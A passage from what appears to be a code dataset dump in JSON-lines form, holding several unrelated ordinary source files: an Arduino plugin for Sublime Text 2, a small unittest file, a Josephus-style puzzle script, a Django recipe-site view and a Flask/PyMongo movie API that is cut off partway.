menu_str)\n\t\telif self.parameter1:\n\t\t\tmenu_str = stino.utils.genKey(sel_item, self.parameter1)\n\t\telse:\n\t\t\tmenu_str = sel_item\n\n\t\tself.window.run_command(self.command, {'menu_str': menu_str})\n\nclass NotEnabledCommand(sublime_plugin.WindowCommand):\n\tdef is_enabled(self):\n\t\treturn False\n\nclass SketchListener(sublime_plugin.EventListener):\n\tdef on_new(self, view):\n\t\tstino.const.settings.set('show_arduino_menu', False)\n\t\tstino.const.settings.set('show_serial_monitor_menu', False)\n\t\tstino.cur_menu.update()\n\t\tstino.serial_listener.stop()\n\t\tstino.status_info.setView(view)\n\t\tstino.status_info.update()\n\n\tdef on_activated(self, view):\n\t\tif not stino.stpanel.isPanel(view):\n\t\t\tpre_state = stino.const.settings.get('show_arduino_menu')\n\t\t\tfilename = view.file_name()\n\t\t\t\n\t\t\tsketch = view\n\t\t\tif filename:\n\t\t\t\tif not view.is_dirty():\n\t\t\t\t\tsketch = filename\n\n\t\t\tstate = stino.src.isSketch(sketch)\n\t\t\tif state:\n\t\t\t\tglobal_setting = stino.const.settings.get('global_setting')\n\t\t\t\tif not global_setting:\n\t\t\t\t\tpre_setting_folder_path = stino.const.settings.get('pre_setting_folder_path')\n\t\t\t\t\tfile_path = view.file_name()\n\t\t\t\t\tsetting_folder_path = os.path.split(file_path)[0]\n\t\t\t\t\t\n\t\t\t\t\tif setting_folder_path != pre_setting_folder_path:\n\t\t\t\t\t\tstino.const.settings.changeSettingFileFolder(setting_folder_path)\n\t\t\t\t\t\tstino.arduino_info.update()\n\t\t\t\t\t\tstino.cur_menu.fullUpdate()\n\t\t\t\t\t\tstino.const.settings.set('pre_setting_folder_path', setting_folder_path)\n\n\t\t\tif state != pre_state:\n\t\t\t\tstino.const.settings.set('show_arduino_menu', state)\n\t\t\t\tstino.cur_menu.update()\n\n\t\t\t\tif state:\n\t\t\t\t\tstino.serial_listener.start()\n\t\t\t\telse:\n\t\t\t\t\tstino.serial_listener.stop()\n\n\t\t\tpre_state = stino.const.settings.get('show_serial_monitor_menu')\n\t\t\tstate = stino.smonitor.isMonitorView(view)\n\t\t\tif state != 
pre_state:\n\t\t\t\tstino.const.settings.set('show_serial_monitor_menu', state)\n\t\t\t\tstino.cur_menu.update()\n\t\t\t\tview.window().run_command('send_to_serial')\n\n\t\t\tstino.status_info.setView(view)\n\t\t\tstino.status_info.update()\n\n\tdef on_close(self, view):\n\t\tif stino.smonitor.isMonitorView(view):\n\t\t\tname = view.name()\n\t\t\tserial_port = name.split('-')[1].strip()\n\t\t\tif serial_port in stino.serial_port_monitor_dict:\n\t\t\t\tserial_monitor = stino.serial_port_monitor_dict[serial_port]\n\t\t\t\tserial_monitor.stop()\n\t\t\t\tif serial_port in stino.serial_port_in_use_list:\n\t\t\t\t\tstino.serial_port_in_use_list.remove(serial_port)\n\nclass ShowArduinoMenuCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tshow_arduino_menu = not stino.const.settings.get('show_arduino_menu')\n\t\tstino.const.settings.set('show_arduino_menu', show_arduino_menu)\n\t\tstino.cur_menu.update()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu')\n\t\treturn state\n\nclass NewSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tcaption = '%(Name_for_new_sketch:)s'\n\t\tcaption = caption % stino.cur_language.getTransDict()\n\t\tself.window.show_input_panel(caption, '', self.on_done, None, None)\n\n\tdef on_done(self, input_text):\n\t\tif input_text:\n\t\t\tfilename = stino.osfile.regulariseFilename(input_text)\n\t\t\tif stino.osfile.existsInSketchbook(filename):\n\t\t\t\tdisplay_text = 'A sketch (or folder) named \"{1}\" already exists. 
Could not create the sketch.\\n'\n\t\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\t\tmsg = msg.replace('{1}', filename)\n\t\t\t\tstino.log_panel.addText(msg)\n\t\t\telse:\n\t\t\t\tstino.src.createNewSketch(filename)\n\t\t\t\tstino.arduino_info.sketchbookUpdate()\n\t\t\t\tstino.cur_menu.update()\n\nclass OpenSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t# sketchbook_root = stino.const.settings.get('sketchbook_root')\n\t\t# folder_path = os.path.join(sketchbook_root, menu_str)\n\t\tfolder_path = stino.arduino_info.getSketchPath(menu_str)\n\t\tif os.path.isdir(folder_path):\n\t\t\tstino.src.openSketch(folder_path)\n\t\telse:\n\t\t\tdisplay_text = 'The selected sketch no longer exists.\\nYou may need to restart Sublime Text 2\\nto update the sketchbook menu.\\n'\n\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\tstino.log_panel.addText(msg)\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass SelectExampleCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t(example, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\texample_path = stino.arduino_info.getExamplePath(platform, example)\n\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':[example_path], \\\n\t\t\t\t'condition_mod':'arduino', 'condition_func':'isSketchFolder', 'function_mod':'src', \\\n\t\t\t\t'function_func':'openSketch'})\n\nclass NewToSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tcaption = '%(Name_for_new_file:)s'\n\t\tcaption = caption % stino.cur_language.getTransDict()\n\t\tself.window.show_input_panel(caption, '', self.on_done, None, None)\n\n\tdef on_done(self, input_text):\n\t\tif input_text:\n\t\t\tfilename = stino.osfile.regulariseFilename(input_text)\n\t\t\tview_file_name = self.window.active_view().file_name()\n\t\t\tfolder_path = os.path.split(view_file_name)[0]\n\t\t\tnew_file_path = 
os.path.join(folder_path, filename)\n\t\t\tif os.path.exists(new_file_path):\n\t\t\t\tdisplay_text = 'A file named \"{1}\" already exists. Could not create the file.\\n'\n\t\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\t\tmsg = msg.replace('{1}', filename)\n\t\t\t\tstino.log_panel.addText(msg)\n\t\t\telse:\n\t\t\t\tstino.src.createNewFile(self.window, new_file_path)\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass ImportLibraryCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tview = self.window.active_view()\n\t\t(library, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\tlibrary_path = stino.arduino_info.getLibraryPath(platform, library)\n\t\tif os.path.isdir(library_path):\n\t\t\tstino.src.insertLibraries(library_path, view)\n\t\telse:\n\t\t\tdisplay_text = 'The selected library no longer exists.\\nYou may need to restart Sublime Text 2\\nto update the import library menu.\\n'\n\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\tstino.log_panel.addText(msg)\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass ShowSketchFolderCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tfilename = self.window.active_view().file_name()\n\t\tif filename:\n\t\t\t# sketch_folder_path = stino.src.getSketchFolderPath(filename)\n\t\t\tsketch_folder_path = os.path.split(filename)[0]\n\t\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':[sketch_folder_path], \\\n\t\t\t\t'condition_mod':'osfile', 'condition_func':'isFile', 'function_mod':'osfile', \\\n\t\t\t\t'function_func':'openFile'})\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass ChangeExtraFlagsCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tcaption = '%(Extra compilation flags:)s'\n\t\tcaption = caption % 
stino.cur_language.getTransDict()\n\t\textra_flags = stino.const.settings.get('extra_flags')\n\t\tif (not extra_flags) or (len(extra_flags) < 2):\n\t\t\textra_flags = '-D'\n\t\tself.window.show_input_panel(caption, extra_flags, self.on_done, None, None)\n\n\tdef on_done(self, input_text):\n\t\textra_flags = input_text\n\t\tif (not extra_flags) or (len(extra_flags) < 3):\n\t\t\textra_flags = ''\n\t\tstino.const.settings.set('extra_flags', extra_flags)\n\n\tdef description(self):\n\t\textra_flags = stino.const.settings.get('extra_flags')\n\t\tif (not extra_flags) or (len(extra_flags) < 2):\n\t\t\tcaption = '%(Add_Extra_Flags)s'\n\t\telse:\n\t\t\tcaption = '%(Change_Extra_Flags)s'\n\t\tcaption = caption % stino.cur_language.getTransDict()\n\t\treturn caption\n\nclass CompileSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.active_view().run_command('save')\n\t\tfilename = self.window.active_view().file_name()\n\t\tcur_compilation = stino.compilation.Compilation(stino.cur_language, stino.arduino_info, \\\n\t\t\tstino.cur_menu, filename)\n\t\tcur_compilation.start()\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass UploadBinaryCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.active_view().run_command('save')\n\t\tfilename = self.window.active_view().file_name()\n\t\tcur_upload = stino.compilation.Upload(stino.cur_language, stino.arduino_info, stino.cur_menu, \\\n\t\t\tfilename, serial_port_in_use_list = stino.serial_port_in_use_list, \\\n\t\t\tserial_port_monitor_dict = stino.serial_port_monitor_dict)\n\t\tcur_upload.start()\n\n\tdef is_enabled(self):\n\t\tstate = True\n\t\tplatform = stino.const.settings.get('platform')\n\t\tif 'AVR' in platform:\n\t\t\tserial_port_list = stino.smonitor.genSerialPortList()\n\t\t\tif not serial_port_list:\n\t\t\t\tstate = False\n\t\tshow_state = stino.const.settings.get('show_arduino_menu', False)\n\t\tstate = 
state and show_state\n\t\treturn state\n\nclass UploadUsingProgrammerCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.active_view().run_command('save')\n\t\tfilename = self.window.active_view().file_name()\n\t\tcur_upload = stino.compilation.Upload(stino.cur_language, stino.arduino_info, \\\n\t\t\tstino.cur_menu, filename, mode = 'upload_using_programmer')\n\t\tcur_upload.start()\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tplatform = stino.const.settings.get('platform')\n\t\tprogrammer_lists = stino.arduino_info.getProgrammerLists(platform)\n\t\tif programmer_lists:\n\t\t\tstate = True\n\t\tshow_state = stino.const.settings.get('show_arduino_menu', False)\n\t\tstate = state and show_state\n\t\treturn state\n\nclass SelectBoardCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t(board, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\tpre_platform = stino.const.settings.get('platform')\n\t\tpre_board = stino.const.settings.get('board')\n\t\tif platform != pre_platform or board != pre_board:\n\t\t\tstino.const.settings.set('platform', platform)\n\t\t\tstino.const.settings.set('board', board)\n\t\t\tstino.const.settings.set('full_compilation', True)\n\t\t\tstino.cur_menu.update()\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tplatform = stino.const.settings.get('platform')\n\t\tboard = stino.const.settings.get('board')\n\t\tboard_platform = stino.utils.genKey(board, platform)\n\t\tif menu_str == board_platform:\n\t\t\tstate = True\n\t\treturn state\n\nclass SelectBoardTypeCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t(item, board_type, board, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\ttype_caption = stino.arduino_info.getPlatformTypeCaption(platform, board_type)\n\t\tpre_item = stino.const.settings.get(type_caption)\n\t\tif not item == pre_item:\n\t\t\tstino.const.settings.set(type_caption, 
item)\n\t\t\tstino.const.settings.set('full_compilation', True)\n\t\t\tstino.cur_menu.commandUpdate()\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\t(item, board_type, board, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\ttype_caption = stino.arduino_info.getPlatformTypeCaption(platform, board_type)\n\t\tpre_item = stino.const.settings.get(type_caption)\n\t\tif item == pre_item:\n\t\t\tstate = True\n\t\treturn state\n\nclass SelectSerialPortCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tserial_port = menu_str\n\t\tpre_serial_port = stino.const.settings.get('serial_port')\n\t\tif serial_port != pre_serial_port:\n\t\t\tstino.const.settings.set('serial_port', serial_port)\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tserial_port = stino.const.settings.get('serial_port')\n\t\tif menu_str == serial_port:\n\t\t\tstate = True\n\t\treturn state\n\nclass SelectBaudrateCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tbaudrate = menu_str\n\t\tpre_baudrate = stino.const.settings.get('baudrate')\n\t\tif baudrate != pre_baudrate:\n\t\t\tstino.const.settings.set('baudrate', baudrate)\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tbaudrate = stino.const.settings.get('baudrate')\n\t\tif menu_str == baudrate:\n\t\t\tstate = True\n\t\treturn state\n\nclass StartSerialMonitorCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tserial_port = stino.const.settings.get('serial_port')\n\t\tif not serial_port in stino.serial_port_in_use_list:\n\t\t\tserial_monitor = stino.smonitor.SerialMonitor(serial_port)\n\t\t\tstino.serial_port_in_use_list.append(serial_port)\n\t\t\tstino.serial_port_monitor_dict[serial_port] = serial_monitor\n\t\telse:\n\t\t\tserial_monitor = 
stino.serial_port_monitor_dict[serial_port]\n\t\tserial_monitor.start()\n\t\tself.window.run_command('send_to_serial')\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tserial_port = stino.const.settings.get('serial_port')\n\t\tserial_port_list = stino.smonitor.genSerialPortList()\n\t\tif serial_port in serial_port_list:\n\t\t\t# if stino.smonitor.isSerialPortAvailable(serial_port):\n\t\t\tstate = True\n\t\treturn state\n\nclass StopSerialMonitorCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tname = self.window.active_view().name()\n\t\tserial_port = name.split('-')[1].strip()\n\t\tserial_monitor = stino.serial_port_monitor_dict[serial_port]\n\t\tserial_monitor.stop()\n\t\tif serial_port in stino.serial_port_in_use_list:\n\t\t\tstino.serial_port_in_use_list.remove(serial_port)\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tview = self.window.active_view()\n\t\tif stino.smonitor.isMonitorView(view):\n\t\t\tname = view.name()\n\t\t\tserial_port = name.split('-')[1].strip()\n\t\t\tserial_port_list = stino.serial_port_in_use_list\n\t\t\tif serial_port in serial_port_list:\n\t\t\t\tstate = True\n\t\treturn state\n\nclass SendToSerialCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tcaption = '%(Send)s'\n\t\tself.caption = caption % stino.cur_language.getTransDict()\n\t\tself.window.show_input_panel(self.caption, '', self.on_done, None, None)\n\t\t\n\tdef on_done(self, input_text):\n\t\tif input_text:\n\t\t\tview = self.window.active_view()\n\t\t\tif stino.smonitor.isMonitorView(view):\n\t\t\t\tname = view.name()\n\t\t\t\tserial_port = name.split('-')[1].strip()\n\t\t\t\tif serial_port in stino.serial_port_in_use_list:\n\t\t\t\t\tserial_monitor = stino.serial_port_monitor_dict[serial_port]\n\t\t\t\t\tserial_monitor.send(input_text)\n\t\t\t\t\tself.window.show_input_panel(self.caption, '', self.on_done, None, None)\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tview = self.window.active_view()\n\t\tif 
stino.smonitor.isMonitorView(view):\n\t\t\tname = view.name()\n\t\t\tserial_port = name.split('-')[1].strip()\n\t\t\tserial_port_list = stino.serial_port_in_use_list\n\t\t\tif serial_port in serial_port_list:\n\t\t\t\tstate = True\n\t\treturn state\n\nclass SelectProgrammerCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\t(programmer, platform) = stino.utils.getInfoFromKey(menu_str)\n\t\tpre_platform = stino.const.settings.get('platform')\n\t\tpre_programmer = stino.const.settings.get('programmer')\n\t\tif platform != pre_platform or programmer != pre_programmer:\n\t\t\tstino.const.settings.set('programmer', programmer)\n\t\t\tstino.status_info.update()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tplatform = stino.const.settings.get('platform')\n\t\tprogrammer = stino.const.settings.get('programmer')\n\t\tprogrammer_platform = stino.utils.genKey(programmer, platform)\n\t\tif menu_str == programmer_platform:\n\t\t\tstate = True\n\t\treturn state\n\nclass BurnBootloaderCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.active_view().run_command('save')\n\t\tfilename = self.window.active_view().file_name()\n\t\tcur_burn = stino.compilation.BurnBootloader(stino.cur_language, stino.arduino_info, stino.cur_menu, filename)\n\t\tcur_burn.start()\n\n\tdef is_enabled(self):\n\t\tstate = False\n\t\tplatform = stino.const.settings.get('platform')\n\t\tprogrammer_lists = stino.arduino_info.getProgrammerLists(platform)\n\t\tif programmer_lists:\n\t\t\tstate = True\n\t\tshow_state = stino.const.settings.get('show_arduino_menu', False)\n\t\tstate = state and show_state\n\t\treturn state\n\nclass SelectLanguageCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tlanguage = stino.cur_language.getLanguageFromLanguageText(menu_str)\n\t\tpre_language = stino.const.settings.get('language')\n\t\tif language != pre_language:\n\t\t\tstino.const.settings.set('language', 
language)\n\t\t\tstino.cur_language.update()\n\t\t\tstino.cur_menu.languageUpdate()\n\n\tdef is_checked(self, menu_str):\n\t\tstate = False\n\t\tsetting_language = stino.const.settings.get('language')\n\t\tcur_language = stino.cur_language.getLanguageFromLanguageText(menu_str)\n\t\tif cur_language == setting_language:\n\t\t\tstate = True\n\t\treturn state\n\nclass ToggleGlobalSettingCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tglobal_setting = not stino.const.settings.get('global_setting')\n\t\tstino.const.settings.set('global_setting', global_setting)\n\t\tif not global_setting:\n\t\t\tfile_path = self.window.active_view().file_name()\n\t\t\tsetting_folder_path = os.path.split(file_path)[0]\n\t\t\tstino.const.settings.changeSettingFileFolder(setting_folder_path)\n\t\tstino.const.settings.changeState(global_setting)\n\t\tstino.arduino_info.update()\n\t\tstino.cur_menu.fullUpdate()\n\t\tstino.status_info.update()\n\t\t\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('global_setting')\n\t\treturn state\n\n\tdef is_enabled(self):\n\t\tstate = stino.const.settings.get('show_arduino_menu', False)\n\t\treturn state\n\nclass SelectArduinoFolderCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tapp_root_list = stino.osfile.getAppRootList()\n\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':app_root_list, \\\n\t\t\t'condition_mod':'arduino', 'condition_func':'isArduinoRoot', 'function_mod':'actions', \\\n\t\t\t'function_func':'changeArduinoRoot', 'with_files': False})\n\nclass ChangeSketchbookFolderCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\thome_root_list = stino.osfile.getHomeRootList()\n\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':home_root_list, \\\n\t\t\t'condition_mod':'osfile', 'condition_func':'isButtonPress', 'function_mod':'actions', \\\n\t\t\t'function_func':'changeSketchbookRoot', 'with_files': False, 'with_button': True})\n\nclass 
ToggleFullCompilationCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tfull_compilation = not stino.const.settings.get('full_compilation')\n\t\tstino.const.settings.set('full_compilation', full_compilation)\n\t\tstino.cur_menu.commandUpdate()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('full_compilation')\n\t\treturn state\n\nclass ToggleVerboseCompilationCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tverbose_compilation = not stino.const.settings.get('verbose_compilation')\n\t\tstino.const.settings.set('verbose_compilation', verbose_compilation)\n\t\tstino.cur_menu.commandUpdate()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('verbose_compilation')\n\t\treturn state\n\nclass ToggleVerboseUploadCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tverbose_upload = not stino.const.settings.get('verbose_upload')\n\t\tstino.const.settings.set('verbose_upload', verbose_upload)\n\t\tstino.cur_menu.commandUpdate()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('verbose_upload')\n\t\treturn state\n\nclass ToggleVerifyCodeCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tverify_code = not stino.const.settings.get('verify_code')\n\t\tstino.const.settings.set('verify_code', verify_code)\n\t\tstino.cur_menu.commandUpdate()\n\n\tdef is_checked(self):\n\t\tstate = stino.const.settings.get('verify_code')\n\t\treturn state\n\nclass AutoFormatCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tself.window.run_command('reindent', {'single_line': False})\n\t\tdisplay_text = 'Auto Format finished.\\n'\n\t\tmsg = stino.cur_language.translate(display_text)\n\t\tstate = stino.log_panel.addText(msg)\n\nclass ArchiveSketchCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tfilename = self.window.active_view().file_name()\n\t\tif filename:\n\t\t\tsketch_folder_path = stino.src.getSketchFolderPath(filename)\n\t\t\thome_root_list = 
stino.osfile.getHomeRootList()\n\t\t\tself.window.run_command('show_file_explorer_panel', {'top_path_list':home_root_list, \\\n\t\t\t\t'condition_mod':'osfile', 'condition_func':'isButtonPress', 'function_mod':'actions', \\\n\t\t\t\t'function_func':'getArchiveFolderPath', 'with_files': False, 'with_button': True, \\\n\t\t\t\t'extra_parameter': sketch_folder_path})\n\nclass FixEncodingCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tview = self.window.active_view()\n\t\tfilename = view.file_name()\n\t\tif filename:\n\t\t\tstate = True\n\t\t\tif view.is_dirty():\n\t\t\t\tdisplay_text = 'Discard all changes and reload sketch?\\n'\n\t\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\t\tstate = sublime.ok_cancel_dialog(msg)\n\t\t\n\t\t\tif state:\n\t\t\t\tcontent = stino.osfile.readFileText(filename)\n\t\t\t\tedit = view.begin_edit()\n\t\t\t\tview.replace(edit, sublime.Region(0, view.size()), content)\n\t\t\t\tview.end_edit(edit)\n\nclass OpenRefCommand(sublime_plugin.WindowCommand):\n\tdef run(self, menu_str):\n\t\tstino.osfile.openUrl(menu_str)\n\nclass FindInReferenceCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tview = self.window.active_view()\n\t\tselected_text = stino.utils.getSelectedTextFromView(view)\n\t\tplatform = stino.const.settings.get('platform')\n\t\tkeyword_operator_list = stino.arduino_info.getOperatorList(platform)\n\t\tkeyword_list = stino.utils.getKeywordListFromText(selected_text, keyword_operator_list)\n\t\t(ref_list, msg_text) = stino.utils.getRefList(keyword_list, stino.arduino_info, platform)\n\t\tif ref_list:\n\t\t\tstino.osfile.openUrlList(ref_list)\n\t\tif msg_text:\n\t\t\tstino.log_panel.addText(msg_text)\n\t\tif not (ref_list or msg_text):\n\t\t\tdisplay_text = 'No reference available.\\n'\n\t\t\tmsg = stino.cur_language.translate(display_text)\n\t\t\tstate = stino.log_panel.addText(msg)\n\nclass AboutStinoCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tdisplay_text = 'Stino'\n\t\tmsg = 
stino.cur_language.translate(display_text)\n\t\tsublime.message_dialog(msg)\n","sub_path":"Lib/Sublime Text 2/sublime-text-2/Backup/20140109131440/Arduino-like IDE/stcommands.py","file_name":"stcommands.py","file_ext":"py","file_size_in_byte":24071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"648398886","text":"import unittest\nimport data_in\n\n\nclass TestInputs(unittest.TestCase):\n\tdef test_name_is_string(self):\n\t\td = data_in.InputFiles.is_shapefile(['somestring'])\n\t\tself.assertIsInstance(d, str)\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"src/test_data_in.py","file_name":"test_data_in.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422980270","text":"# encoding:utf-8\r\n\r\nimport sys\r\n\r\ndef delete(n_p,A):\r\n list_people = []\r\n n_c = len(A)\r\n for i in range(n_p):\r\n list_people.append(i)\r\n count = 1 # 寻找k ,循环轮数,淘汰人数\r\n i = 0 # 计数开始的位置\r\n\r\n k = 0\r\n while(count < n_p):\r\n if list_people[i] != -1:\r\n k+=1\r\n if k==A[(count-1)%n_c]:\r\n list_people[i]=-1\r\n print(i)\r\n k=0\r\n count+=1\r\n i+=1\r\n if i==n_p:\r\n i=0\r\n for i in range(n_p):\r\n if list_people[i]!=-1:\r\n return i\r\n\r\nif __name__ == '__main__':\r\n N =int(sys.stdin.readline().strip())\r\n tests = []\r\n for i in range(N):\r\n line = sys.stdin.readline().strip().split()\r\n line = [ int(value) for value in line]\r\n tests.append(line)\r\n for line in tests:\r\n n_p = line[0]\r\n A = line[2:]\r\n print(delete(n_p,A))\r\n","sub_path":"Toutiao_bishi/count_03.py","file_name":"count_03.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392127503","text":"from django.db.models import Q\nfrom django.shortcuts import render\nfrom django.views.generic import View, ListView\nfrom google.cloud import 
storage\nfrom recetas.models import Receta\nimport datetime\nfrom django.conf import settings\n\n\nclass RecetasQueryset(object):\n def get_recetas_queryset(self, request):\n # Ordenamos por fecha de creación descendente y cogemos solo los 25 primeros\n recetas = Receta.objects.all().order_by('-fechaCreacion')[:25]\n\n return recetas\n\n\nclass HomeView(View, RecetasQueryset):\n def get(self, request):\n receta = self.get_recetas_queryset(request)\n\n client = storage.Client.from_service_account_json('key.json')\n bucket = client.get_bucket(settings.BUCKET_NAME)\n\n for rec in receta:\n blob = bucket.get_blob(settings.RECIPES_FOLDER_NAME + rec.nombreFoto)\n url = blob.generate_signed_url(\n expiration=datetime.timedelta(hours=1),\n method='GET'\n )\n\n rec.urlTemporalFoto = url\n\n context = {\n 'claseInicio': 'active',\n 'claseRecetasDe': '',\n 'claseTopRecetas': '',\n 'claseUserRecetas': '',\n 'claseCategorias_list': '',\n 'recetas_list': receta\n }\n\n return render(request, 'recetas/home.html', context)\n\n\nclass CategoriasListView(View):\n def get(self, request):\n context = {\n 'claseInicio': '',\n 'claseRecetasDe': '',\n 'claseTopRecetas': '',\n 'claseUserRecetas': '',\n 'claseCategorias_list': 'active'\n }\n\n return render(request, 'recetas/categorias.html', context)\n\n\nclass RecetasDeListView(View):\n def get(self, request):\n context = {\n 'claseInicio': '',\n 'claseRecetasDe': 'active',\n 'claseTopRecetas': '',\n 'claseUserRecetas': '',\n 'claseCategorias_list': ''\n }\n\n return render(request, 'recetas/recetasDe.html', context)\n\n\nclass UserRecetasView(View):\n def get(self, request):\n context = {\n 'claseInicio': '',\n 'claseRecetasDe': '',\n 'claseTopRecetas': '',\n 'claseUserRecetas': 'active',\n 'claseCategorias_list': ''\n }\n\n return render(request, 'recetas/user_recetas.html', context)\n\n\nclass TopRecetas(View):\n def get(self, request):\n context = {\n 'claseInicio': '',\n 'claseRecetasDe': '',\n 'claseTopRecetas': 'active',\n 
'claseUserRecetas': '',\n 'claseCategorias_list': ''\n }\n\n return render(request, 'recetas/topRecetas.html', context)\n","sub_path":"recetas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"572587476","text":"def has_negatives(a):\n index = {}\n result = []\n\n for i in a:\n index[i] = i\n \n for i in index:\n # print(i, index[i])\n j = -i\n if j > 0 and j in index:\n result.append(j)\n\n return result\n\n\nif __name__ == \"__main__\":\n print(has_negatives([-1, -2, 1, 2, 3, 4, -4]))\n","sub_path":"hashtables/ex4/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"496835965","text":"from flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom flask_pymongo import PyMongo\n\napp = Flask(__name__)\n\napp.config['MONGO_DBNAME'] = 'imdb_data'\napp.config['MONGO_URI'] = 'mongodb://localhost:27017/imdb_data'\n\nmongo = PyMongo(app)\n\n@app.route('/movie', methods=['GET'])\ndef get_all_movies():\n movies = mongo.db.movies_data\n output = []\n for movie in movies.find({}):\n output.append({\n 'movie_id' : movie['movie_id'],\n 'title' : movie['title'],\n 'year' : movie['year'],\n 'genres' : movie['genres'],\n 'imdb_rating' : movie['imdb_rating'],\n 'metascore' : movie['metascore'],\n 'directors_ids' : movie['directors_ids'],\n 'imdb_rating' : movie['imdb_rating'],\n 'runtime' : movie['runtime'],\n 'budget' : movie['budget'],\n 'countrys' : movie['countrys']\n })\n return jsonify({'result' : output})\n\n@app.route('/movie/', methods=['GET'])\ndef get_one_movie(id):\n movies = mongo.db.movies_data\n movie = movies.find_one_or_404({'movie_id' : id})\n output = {\n 'movie_id' : movie['movie_id'],\n 'title' : movie['title'],\n 'year' : movie['year'],\n 'genres' : movie['genres'],\n 'imdb_rating' : 
